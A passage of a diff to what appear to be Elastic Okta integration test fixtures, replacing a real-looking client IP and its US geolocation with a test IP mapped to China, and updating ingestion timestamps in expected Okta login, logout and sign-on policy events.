Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", + "ingested": "2021-12-09T13:42:54.417340700Z", + "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", "id": "faf7398a-4f77-11ea-97fb-5925e98228bd", @@ -102,7 +101,7 @@ "raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "browser": "FIREFOX" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "uuid": "faf7398a-4f77-11ea-97fb-5925e98228bd", "outcome": { @@ -133,28 +132,27 @@ { "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Dublin", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -121.919, - "lat": 37.7201 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7018, + "number": 4837, "organization": { - "name": "AT\u0026T Services, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "user": { "full_name": "xxxxxx", "id": "00u1abvz4pYqdM8ms4x6" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -168,7 +166,7 @@ "xxxxxx" ], "ip": [ - "108.255.197.247" + "175.16.199.1" ] }, "client": { @@ -185,11 +183,11 @@ "full_name": "xxxxxx", "id": "00u1abvz4pYqdM8ms4x6" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "event": { - "ingested": "2021-06-14T07:17:41.693743800Z", - "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", + "ingested": "2021-12-09T13:42:54.417349900Z", + "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", "id": "faf7398a-4f77-11ea-97fb-5925e98228bd", @@ -232,7 +230,7 @@ "raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "browser": "FIREFOX" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "uuid": "faf7398a-4f77-11ea-97fb-5925e98228bd", "outcome": { @@ -263,28 +261,27 @@ { "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Dublin", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -121.919, - "lat": 37.7201 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7018, + "number": 4837, "organization": { - "name": "AT\u0026T Services, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "user": { "full_name": "xxxxxx", "id": "00u1abvz4pYqdM8ms4x6" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -298,7 +295,7 @@ "xxxxxx" ], "ip": [ - "108.255.197.247" + "175.16.199.1" ] }, "client": { @@ -315,11 +312,11 @@ "full_name": "xxxxxx", "id": "00u1abvz4pYqdM8ms4x6" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "event": { - "ingested": "2021-06-14T07:17:41.693751400Z", - "original": 